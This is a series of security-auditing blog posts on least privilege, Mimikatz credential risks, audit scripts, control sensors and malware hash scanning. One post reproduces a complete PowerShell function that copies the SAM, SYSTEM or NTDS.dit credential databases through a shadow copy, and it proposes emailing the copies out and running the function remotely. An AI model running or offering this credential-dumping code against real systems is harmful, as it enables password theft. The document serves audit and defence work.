Using File Monitoring to Limit Admin Rights

Over the past few weeks we have been posting blogs about the importance of limiting user account rights to only what is necessary for someone to do their job. Users should have all the rights necessary to do their job, but nothing less and certainly not any more. This includes local administrator rights. Only the people that absolutely need those rights should be given those rights. It is also our argument that fewer people actually need those rights that people generally believe. We’ve also posted a few times already on the dangers of giving people too many rights on a system. And remember, this applies to both Windows and Unix systems. Just because you can login as root, it doesn’t mean you should.

A question that comes up a lot though is, “What about software programs that require the user to be a local administrator in order to run the program?” Well, as I argued in a previous post, most programs don’t need the actual local administrator rights, they just need access to an object that the current user doesn’t have access too.

One of the most common objects that users often do not have the rights to are file system objects. Now in a perfect world, software developers would write their programs to only access portions of the file system that are accessible to everyday users. Or at a minimum, developers would document what file system objects they need to access to run their software. Of course reality says developers & documentation rarely go together. So how can a sysadmin figure this out for themselves?

In the old days, we could always use tools like Filemon & Regmon by Sysinternals to figure this out at a granular level. Unfortunately after Sysinternals was purchased by Microsoft, they combined the tools into one giant monitoring tool called Process Monitor. Don’t get me wrong, it’s a great tool and very capable of gathering system information. The trouble is it can be TOO powerful. Sometimes there are so many things happening on a system that it can be difficult to isolate just the file system events. So it would appear we need a different tool that we could use to monitor simply the file system object events to help us isolate where a user may need additional user permissions.

In searching for an app that would do this, I wanted something that would be isolated to file system objects, have the ability to start and stop monitoring on command, have the ability to reset logs, and have the ability to export data to a CSV or similar format so I could manipulate the data in Excel later if I needed to. Oh, and it would be nice if the tool were free. Even better would be if the app were a portable app that I could bring with me in my toolkit without having to install it on a machine. That’s when I found Moo0 File Monitor.

Let’s say I wanted to run Microsoft Word as my test case. I want to make sure I know all the file system objects that Word needs to access in order to run on my machine. To gather my data I would need to:

  1. Close all open programs running on my computer (for the cleanest results).
  2. Open Moo0 File Monitor and make sure it’s gathering data.
  3. Clear the Moo0 logs to get a blank slate.
  4. Open the program I want to test (such as Microsoft Word).
  5. Close the program I’m monitoring to see files accessed on program exit.
  6. Click the Stop button in Moo0 File Monitor to stop collecting data.
  7. Save the Log File for later analysis.

The results of this process should be a list of files that were accessed during my session working with the software program in question. In this case when I tested it with Microsoft Word I received the following results:

moo0

Now we can use this information to examine all the file system object permissions that were listed in the log we created. Granted this can be a tedious process, looking at each set of permissions one at a time. However if you’re patient this can lead to giving people access to the objects they need to run their applications without giving them rights to all the files on the file system (ie. Local administrator). There may be more steps you need to take, such as looking at the registry or user rights as well, but this is often a good place to start and often solves the problem for you.

Hopefully tools like this make it easier for you to give people only the rights they need to do their jobs. If you have other tools that you think will help, send us a note on Twitter at @isaudit. We’d love to hear what’s worked for you as well.

The Danger of Local Windows Administrator Rights

A couple weeks ago I wrote a blog post about limiting local Windows administrator rights – the importance of it and some of the things organizations can do to allow end users to work without having those rights (http://bit.ly/1hpyllB). One of the questions that has come up, and it always does, is the question – how bad is it if users have local administrator rights?

Obviously the easiest answer is BAD, REALLY BAD! It’s like you buy a house or a car and then decide that you don’t need locks on any of the doors. The reason we have file permissions, registry permissions, user right assignments, and the like in Windows is to limit ourselves to only having the rights we need on a system that are necessary in order for us to do our jobs. We shouldn’t have any more or any less rights than are necessary. But when we give our end users administrator rights, it is like we’ve just taken all the locks off the doors and given those users the ability to go into any room of the house without our permission.

Ok, so beyond the simple answer, what else could happen on a machine if we allow users to be local administrators of their machines? Here are just a few of the things that could happen:

  1. System files can be accessed or changed.
  2. Program files or program configurations could be modified.
  3. Software that is not approved could be installed, and won’t be maintained.
  4. Malicious code can be installed with unlimited rights.
  5. New, unapproved user accounts could be added to the system.
  6. Password policies could be subverted.
  7. Security controls such as anti-malware, firewalls, removable media controls, could be disabled.

And as you can imagine, the list goes on and on…

One other fun issue to consider is the issue of passwords. Many people have heard of the pass the hash attack where an attacker steals the local password hash from a machine and then replays it into the system’s memory whenever they want to authenticate as that user. This attack is certainly possible when users have local administrator rights. But wouldn’t it be easier if the user could just steal passwords out of memory in clear text instead? Well it turns out that’s possible too. Enter Mimikatz.

For a nice long, technical explanation of how Mimikatz works, there are plenty of nice tutorials (although to be fair many of them are in French). But here’s the bottom line, if your users are local administrators on their Windows machine, then they will by default have the user right assignment of “Debug Programs” (or they can assign themselves this right if it is taken away by a security policy). Once they have this right they have the ability to interact with sensitive portions of memory, such as those where authentication credentials are stored. With that information they are able to read authentication credentials out of memory as seen in the following screen capture:

mimikatz

Not only are we able to read the NTLM password hash out of memory – which could be taken offline and cracked or used in a pass the hash attach, but we are given the passwords for every logged in user in plain text. Even in the above example where the user is utilizing upper case, lower case, numbers, and special characters and a long password, there is no need for the time or computing resources to crack the password because it is there in clear text.

Many people might wonder at this point, is this only in older versions of Windows? Unfortunately the answer is no. Version 1.0 of Mimikatz works all the way through Windows 8 systems (although Windows 8.1 does appear to be safe). Version 2.0 of Mimikatz works even with Windows 8.1 systems to manipulate this type of information. And if you were wondering, yes, there is integration between Mimikatz and the Metasploit framework to make your penetration testing efforts easier. And, just because, there is also a plugin for Mimikatz for Volatility if you’d like to play with this tool with offline forensic memory dumps.

So once again, let’s restate the issue. How bad is it if end users have local administrator rights on their Windows machines? It’s BAD, REALLY BAD!! Both the Australians DSD in their Top 35 Mitigation Strategies document and the Council on CyberSecurity in their Critical Security Controls document list this issue as a serious concern. Hopefully we can all make sure to keep this issue in mind as we defend our systems.

Community PowerShell Security Audit Scripts

Back in December we posted a couple scripts that fellow auditors had pointed out to us that helped auditors dump Microsoft Windows file permissions to a CSV file for easier auditing. As a result of that post we’ve had feedback from a number of people that it would be helpful to see more of these scripts and even some suggestions for PowerShell audit scripts that we might want to share with others.

Two scripts immediately jumped out to us this past month as comprehensive PowerShell audit scripts that might help people who are auditing Microsoft Windows systems. These might inspire you to write your own script or maybe you just want to use these in the course of your audits. So we’ll share them here for you in the hopes that they make your life as an auditor easier.

The first script was posted to the Microsoft Script Center and was written to perform a comprehensive system audit of multiple machines that are detected in an Active Directory environment:

http://gallery.technet.microsoft.com/scriptcenter/Computer-Network-Audit-6593a48d

The second script we wanted to share was written by Alan Renouf and we especially liked this one because of the nicely formatted output after auditing a system:

http://poshcode.org/639

Both of these scripts illustrate the ideas we’ve been trying to teach people of automating your audit efforts. These are both good examples of what we hope you all are creating. If you do have further suggestions, please pass them along. You can email [email protected] if you have more resources you’d like us to share with the community.

Extracting Windows Passwords with PowerShell

Happy New Year! I hope everyone has had a great holiday season so far and is excited and ready for a new year full of auditing excitement! For the first post of the year I thought we would discuss a topic more for fun and something different in the hopes of inspiring you to spend a little more with PowerShell and scripting.

WARNING: Please do not attempt anything we’re about to discuss without clear permission from everyone and anyone you can think of. If you don’t have permission, don’t do it!! Anyways…

One problem auditors and penetration testers often have when auditing passwords is that most of the tools that are commonly used to extract passwords from a Windows system are viewed as malware by the anti-virus software installed on the system. Or if you have whitelisting software installed, then you are only able to execute the binaries approved in advance by management. But what if you want to rely on native tools and commands to do your assessment and you want to “live off the land”? That’s where Microsoft’s PowerShell comes in handy.

The folks at ObscureSecurity.com (http://www.obscuresecurity.blogspot.com/) contributed a function to the Microsoft Scripting Center called Get-PasswordFile. The idea of the script is to use native PowerShell functions to extract a local SAM database from a Microsoft Windows computer without causing damage to the underlying operating system or trigger an anti-virus alert. If you’re not sure what to do with a PowerShell function, here’s some advise you might want to read as well (http://www.mikepfeiffer.net/2010/06/how-to-add-functions-to-your-powershell-session/).

Here’s the code for their function:

function Get-PasswordFile { 
<# 
.SYNOPSIS 
 
    Copies either the SAM or NTDS.dit and system files to a specified directory. 
 
.PARAMETER DestinationPath 
 
    Specifies the directory to the location where the password files are to be copied. 
 
.OUTPUTS 
 
    None or an object representing the copied items. 
 
.EXAMPLE 
 
    Get-PasswordFile "c:\temp" 
 
#> 
 
    [CmdletBinding()] 
    Param 
    ( 
        [Parameter(Mandatory = $true, Position = 0)] 
        [ValidateScript({Test-Path $_ -PathType 'Container'})]  
        [ValidateNotNullOrEmpty()] 
        [String]  
        $DestinationPath      
    ) 
 
        #Define Copy-RawItem helper function from http://gallery.technet.microsoft.com/scriptcenter/Copy-RawItem-Private-NET-78917643 
        function Copy-RawItem 
        { 
 
        [CmdletBinding()] 
        [OutputType([System.IO.FileSystemInfo])] 
        Param ( 
            [Parameter(Mandatory = $True, Position = 0)] 
            [ValidateNotNullOrEmpty()] 
            [String] 
            $Path, 
 
            [Parameter(Mandatory = $True, Position = 1)] 
            [ValidateNotNullOrEmpty()] 
            [String] 
            $Destination, 
 
            [Switch] 
            $FailIfExists 
        ) 
 
        # Get a reference to the internal method - Microsoft.Win32.Win32Native.CopyFile() 
        $mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\')[-1] -eq 'mscorlib.dll')} 
        $Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native') 
        $CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))  
 
        # Perform the copy 
        $CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists']))) 
 
        $HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() 
 
        if ($CopyResult -eq $False -and $HResult -ne 0) 
        { 
            # An error occured. Display the Win32 error set by CopyFile 
            throw ( New-Object ComponentModel.Win32Exception ) 
        } 
        else 
        { 
            Write-Output (Get-ChildItem $Destination) 
        } 
    } 
  
    #Check for admin rights
    if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
    {
        Write-Error "Not running as admin. Run the script with elevated credentials"
        Return
    }
        
    #Get "vss" service startup type 
    $VssStartMode = (Get-WmiObject -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode 
    if ($VssStartMode -eq "Disabled") {Set-Service vss -StartUpType Manual} 
 
    #Get "vss" Service status and start it if not running 
    $VssStatus = (Get-Service vss).status  
    if ($VssStatus -ne "Running") {Start-Service vss} 
 
        #Check to see if we are on a DC 
        $DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole 
        $IsDC = $False 
        if ($DomainRole -gt 3) { 
            $IsDC = $True 
            $NTDSLocation = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\NTDS\Parameters)."DSA Database File" 
            $FileDrive = ($NTDSLocation).Substring(0,3) 
        } else {$FileDrive = $Env:HOMEDRIVE + '\'} 
     
        #Create a volume shadow filedrive 
        $WmiClass = [WMICLASS]"root\cimv2:Win32_ShadowCopy" 
        $ShadowCopy = $WmiClass.create($FileDrive, "ClientAccessible") 
        $ReturnValue = $ShadowCopy.ReturnValue 
 
        if ($ReturnValue -ne 0) { 
            Write-Error "Shadow copy failed with a value of $ReturnValue" 
            Return 
        }  
     
        #Get the DeviceObject Address 
        $ShadowID = $ShadowCopy.ShadowID 
        $ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject 
     
            #If not a DC, copy System and SAM to specified directory 
            if ($IsDC -ne $true) { 
 
                $SamPath = Join-Path $ShadowVolume "\Windows\System32\Config\sam"  
                $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system" 
 
                #Utilizes Copy-RawItem from Matt Graeber 
                Copy-RawItem $SamPath "$DestinationPath\sam" 
                Copy-RawItem $SystemPath "$DestinationPath\system" 
            } else { 
             
                #Else copy the NTDS.dit and system files to the specified directory             
                $NTDSPath = Join-Path $ShadowVolume "\Windows\NTDS\NTDS.dit"  
                $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system" 
 
                Copy-RawItem $NTDSPath "$DestinationPath\ntds" 
                Copy-RawItem $SystemPath "$DestinationPath\system" 
            }     
     
        #Return "vss" service to previous state 
        If ($VssStatus -eq "Stopped") {Stop-Service vss} 
        If ($VssStartMode -eq "Disabled") {Set-Service vss -StartupType Disabled} 
}

Once you have the local SAM database from a computer the next step would be to examine the databases in your favorite password cracking tool offline, such as Cain from http://oxit.it.

In general those of you who know me know that I’m always a little hesitant to recommend that auditors especially consider password cracking at all. If an auditor chooses to run a script like this there should be a clear business reason for running the script, and should only be done with clearly documented management approval. But a script like this, downloading the SAM database from a local computer can still have quite a few benefits. Some of the controls an auditor might be able to test with this file are:

    Are only the appropriate user accounts on each local computer?
    Are any local user accounts using blank passwords?
    Are any local user accounts using the same password?
    Are any local user accounts using passwords that do not match the organization’s password policies?

So what else could we do with this script? From an automation and penetration testing perspective there’s all sorts of creative things we could do next. Just a few creative ideas you might consider:

    Automate the script to download the local SAM database
    Automate the script to encrypt the SAM and email it to the penetration tester
    Automate the script to run against multiple remote computers

There’s just all sorts of fun that a penetration tester or auditor could have with this tool if they really wanted to. Again, I hope this code is useful to you and your security efforts. To a great 2014!

Sensors for the Critical Security Controls

Most people in information security have heard of the Critical Security Controls these days. The idea of a community risk assessment project that helps all prioritize our information security efforts is appealing to most of us. The sticking question everyone always comes back to though is “how do I start implementing an information security plan using the controls?”

There are a few different approaches to this question. One of the most common is to simply start at the first priority (#1) and work your way through the list. It’s designed to be simple to use.

Ideally though we would have a translation between business requirements and what technical sensors security analysts need to deploy in order to achieve all the goals defined in the controls. So we took it upon ourselves to answer that exact question. If someone would take every sub control in the Critical Security Controls (version 4.1) and map a corresponding sensor to each of the controls, what controls would be left.

This is the list that we came up with (in priority order):

  1. Hardware Inventory System
  2. Asset Inventory System
  3. Active Device Discovery Tool
  4. Passive Device Discovery Tool
  5. System Imaging & Cataloging System
  6. Authentication System
  7. Public Key Infrastructure (PKI)
  8. 802.1x Authentication System (RADIUS / TACACS+ / etc)
  9. Network Access Control (NAC) System
  10. Software Inventory System
  11. Software Whitelisting System
  12. SCAP Compliant Vulnerability Management System
  13. SCAP Compliant Configuration Scanning System
  14. Configuration Policy Enforcement System
  15. Patch Management System
  16. Vulnerability Intelligence Service
  17. File Integrity Assessment System
  18. Anti-Malware / Endpoint Protection System
  19. Email Anti-Malware System
  20. SPF DNS Record
  21. Web Based Anti-Malware System
  22. Web Application Firewall (WAF)
  23. Application Code Review / Vulnerability Scanning System
  24. Database Vulnerability Scanning System
  25. Application Specific Firewalls
  26. Wireless Network Device Management System
  27. Wireless Intrusion Detection System (WIDS)
  28. Backup / Recovery System
  29. Data Encryption System
  30. DHCP Server Logs
  31. Domain Name System (DNS) Monitoring System
  32. Host Based Data Loss Prevention (DLP) System
  33. Host Based Access Control Lists
  34. Host Based Firewalls / Endpoint Protection System
  35. Intrusion / Malware Detection System
  36. Log Management System / SIEM
  37. Network Based Data Loss Prevention (DLP) System
  38. Network Devices that Support VLANs & ACLs
  39. Network Proxy / Firewall / Monitoring System
  40. Password Assessment System
  41. Removable Media Control / Endpoint Protection System
  42. User Account Discovery / Inventory System

It certainly seems like a long list, but I would bet most companies already have many of these controls in place.

It seems to us if an organization would work their way through this list as a part of a gap analysis and then review the controls, they would find that they hand implemented the majority of the sub controls in the list simply by implementing these sensors. Certainly an organization will need to operationalize the controls too. But at least this might help a few organizations to get started in their efforts.

Practical Risk Assessment Tools

In a previous blog post we cataloged a number of risk management methodologies that we’ve seen a number of organizations employ in an effort to manage the security of their information systems. A number of people have asked us though, what tools best assist people implementing those models? Are there tools available to make the process easier or do companies have to develop their own tools to make one of these methods a reality?

Unfortunately the answer is that most of the companies we’ve worked with have chosen to develop their own risk management tools. Though to be fair the majority of companies we meet choose to manage their efforts through very simple tools such as Microsoft Excel spreadsheets. Whole there’s nothing wrong with that, the questions inspired us to consider following up to the previous post with a list of some of the risk assessment toolkits we’ve seen people use.

In the open source world there are a few choices, and more and more seem to be springing up all the time as the need for visual risk assessment tools increase. Some of the more popular tools we’ve encountered are:

  • Binary Risk Assessment Tools
  • Babel Enterprise (free & commercial)
  • Cyber Security Evaluation Tool (DHS)
  • OSSIM SIEM (free & commercial)
  • SOMAP ORICO
  • Practical Threat Analysis (PTA) Professional

But this doesn’t mean that there aren’t commercial tools that are also available to purchase to jumpstart this process. Most tools in this commercial space are known as Governance, Risk, and Compliance (GRC) tools and Gartner even publishes a Magic Quadrant on the subject. Some of the more popular commercial tools are:

  • OpenPages Enterprise GRC
  • Thomson Reuters Paisley
  • Bwise GRC
  • Oracle Enterprise GRC Manager
  • MetricStream
  • Methodware ERA
  • Cura Enterprise
  • Archer Technologies SmartSuite
  • Protiviti Governance Portal
  • Mega Suite
  • Aline Operational Suite
  • CCH TeamMate, Sword, & Axentis
  • IDS Scheer ARIS

Hopefully this list gets you thinking and gives you a good place to get started as you consider which tool is the best option for you. Happy hunting!

Comparing Text Files in Windows

So last month we wrote a post about the built in capabilities of Microsoft Windows to be able to perform comparisons of two text files. Personally when I am comparing two files I am concerned that I can do it from the command line, can easily automate the comparison, and that the output is easy to parse and understand.

Built into Windows the three most common options I have seen to compare text files are:

  • FC.EXE (Windows Binary)
  • COMP.EXE (Windows Binary)
  • COMPARE-OBJECT (PowerShell cmdlet)

As I have said before, COMPARE-OBJECT is about the best option of the three choices, but it sure would be nice if there were more advanced options available with the tool. Ideally we would all have access to a free utility that would meet all the requirements we have been discussing here. But alas, I am not sure we are going to find that right now. So on the commercial side, what is left?

There are quite a few third party tools you might consider. Some of the more popular ones I have seen people use are:

  • WinDiff
  • ExamDiff
  • WinMerge
  • Beyond Compare

If you are looking for a free utility (open source), that also works from the command line, then you should check out WinMerge. If definitely looks like an intriguing project and it meets most of my requirements for a good file differential tool. You can learn more about it at http://winmerge.org/.

But lately I have been most impressed by Beyond Compare’s software (located at . The only downside to the project is that it is commercial. So if you’re planning on deploying it to a large number of systems you may need to shell out some coin. But it’s reasonably priced, so we cannot complain too much.

Not only does the tool meet all of our requirements though, it also comes with a few other nice bells and whistles, like the ability to compare registry settings, the ability to use the unified diff output format, more granular control of comparisons themselves, etc. We do not even get a commission from these folks, but their software seems to be the best suited if you’re looking for a fully capable system.

My guess is that most of us can get away with using WinMerge on a large scale for day to day and basic differentials. But if you really need more advanced capabilities, then forking over the money for a Beyond Compare license is likely worth it.

Searching for Hashes of Malicious Files (APT – Aurora)

A couple weeks ago I posted a blog article with some sample file hashes and domain names associated with the recent Google hacks (think APT or Aurora).

Since then I’ve had quite a few people ask me, if you have a system that you suspect might have been compromised, how do you search that system for files that are malicious if you have a list of hashes that you know are malicious? In other words, you have a list of hashes and you want to know if there are any files on your file system that has the same hash value.

Disclaimer – before we continue you should know, hashes of malicious files are just one way of attempting to discover if your system has been compromised. Especially when dealing with a threat like APT, which is highly intelligent and adaptable, you have to know that if the threat knows that you’re on to them and that you’re looking for a specific set of hashes, that they’re smart enough to adapt. What will they do, they’ll change their malicious files so the hashes change as well. There’s no doubt this is a limitation. But utilizing the technique we’re about to describe you can at least start to eliminate some of the low hanging fruit. You may also want to investigate the projects involved with fuzzy hashing. This may be an alternative to some of the standard techniques described here.

Ok, now that you’re ready to start examining your systems for malicious files, here is a process to consider:

Step One: Assemble a Text File of Known Malicious Hashes. The first step you need to follow is to gather a list of hashes of known malicious files. This will be the list of hashes you’re scanning your system for. Remember, the value of your scan will only be as good as the list of hashes you have. A starter list of MD5 hashes is currently being hosted at Enclavesecurity.com and can be found here if you’re looking for a list to get you started. This list certainly is not comprehensive, but at least is a place to consider building your first list from.

Step Two: Decide Which Hashing Tool to Use. There are a number of good tools that you can use to scan your system and to generate hashes of all the files on your file system. Many of these tools are commercial and there are open source tools for this as well. On the commercial side tools like Tripwire, Lumension, and Bit9 are quite effective at this. There are certainly others, but many of you are already using these tools, so you might as well take advantage of them. Unfortunately there are also many of you that simply cannot afford these tools. If you’re looking for a good open source tool to use to start scanning your systems, let me recommend MD5Deep. This is a tool in the public domain that is especially useful for this purpose. While there’s not enough time in this post to talk about how to use the tool, we’ll post more on it later. You could also consider rolling your own scripts, using PowerShell or shell scripting to generate these hashes as well (but I still recommend MD5Deep – it’s cross platform, supports recursive file scans of directories, and natively interfaces with a number of hash databases).

Step Three: Scan Your System. Now that you have your list of hashes for malicious files and you have your scanning tool, now it’s time to scan your system to see if any files with these hashes exist on your system. This is the basic part of the exercise – do you have malicious files on your system or not? Depending on the tool you’re using this process will be slightly different, but in the end you’re trying to determine if you have a compromised host. Auditors – you should be asking companies the control question, if law enforcement approaches you with a list of hashes like we’re describing here and they say you need to check your system to see if any of these files exist on particular hosts in your environment, how would you look for the hashes? Ask to see their process in action (we want more than tabletop reviews here).

Step Four: Automate System Scans. Finally once you have your tool working in a manual mode, automate the scans. This is one of the major principles of the 20 Critical Controls / Consensus Audit Guidelines that we talk so much about. Manual scans are fine when you need to use them – but how much better is it if you could implement a tool that would be constantly scanning your systems and would notify you one of the hashes were discovered? Automation is key.

While there are certainly other ways to go about looking for malicious files on your file system or indicators of compromise on a system, examining file hashes certainly has to be part of your arsenal. If you’re auditing a system, knowing that you have a control in place to scan for signatures of known bad files has to be part of your toolkit. Traditionally we’ve done this with anti-malware tools, but unfortunately many of the large anti-malware vendors still don’t let you know which hashes they’re scanning for and they don’t give you the ability to add hashes that you’d like to scan for in their tools. Thus we’re left to our own devices to discover if files with these signatures are still on our systems.

Hopefully putting this tool in your toolkit gives you one more angle to consider when looking for indicators of a compromise on your systems.

Checklists a Day: Week in Review – October 5, 2009

So as promised this last week we focused on the Software Development Lifecycle (SDLC) and how to audit an SDLC in an organization. As usual we also wanted to make sure that we gave everyone some fun technical tools to play with, so to keep with the theme we tweeted on tools that you could use to perform automated fuzzing tests on applications. There are a number of other tools we could have also addressed, and we could go on for a few weeks giving you tools , but hopefully you’ll have a good starter list of tools to use now.

This week’s tweets have been a little more random on the checklists we’ve chosen, but the tools will all be consistent. We’re going to focus the tools this week on free tools that Microsoft has embedded in the operating system to give auditors a hand with how to perform assessments against user accounts in an Active Directory environment. I hope you enjoy them!

We’ll post again next week – or follow us live at @jamestarala and @isaudit!

SDLC  Audit Checklists & Security Guides:

SDLC Checklist from Baylor University

SDLC Checklist from ISACA

SDLC Resources from Microsoft

White Box Fuzzing Checklist

Checklist for Auditing IT Contracts

Fuzzing Tools for Auditing Applications:

OWASP WSFuzzer

Wapiti

Microsoft MiniFuzz

iDefense’s Tools

HD Moore’s Axman

We hope everyone will enjoy and use these tools this week. If you have suggestions or ideas for future audit checklists or tools, please let us know, we’d love to hear your feedback.

Checklists a Day: Week in Review – September 28, 2009

So this week we’re back from Tweet-cation, and back to posting audit checklists and tools for everyone to enjoy. Last week I was teaching in San Diego for SANS Network Security and now I’m back and back on the bandwagon. We know everyone’s busy and it’s easy to miss some of these references, so here you go in blog format – which can now be indexed FOREVER by the Google Gods.

This last week’s topic was web application assessment, and we’ll continue the trend via Twitter this week with audit checklists for evaluating an SDLC and tools for fuzzing applications to boot! Not following me on Twitter yet? The handles are @isaudit and @jamestarala.  

Web Application Audit Checklists & Security Guides:

OWASP Web Application Checklist

Web Application Basic & Advanced Checklists

Microsoft – Web App Architecture

Basic SANS Institute Checklist

Tools for Auditing Web Applications:

W3AF

HP WebInspect

Wikto

IBM Appscan

We hope everyone will enjoy and use these tools this week. If you have suggestions or ideas for future audit checklists or tools, please let us know, we’d love to hear your feedback.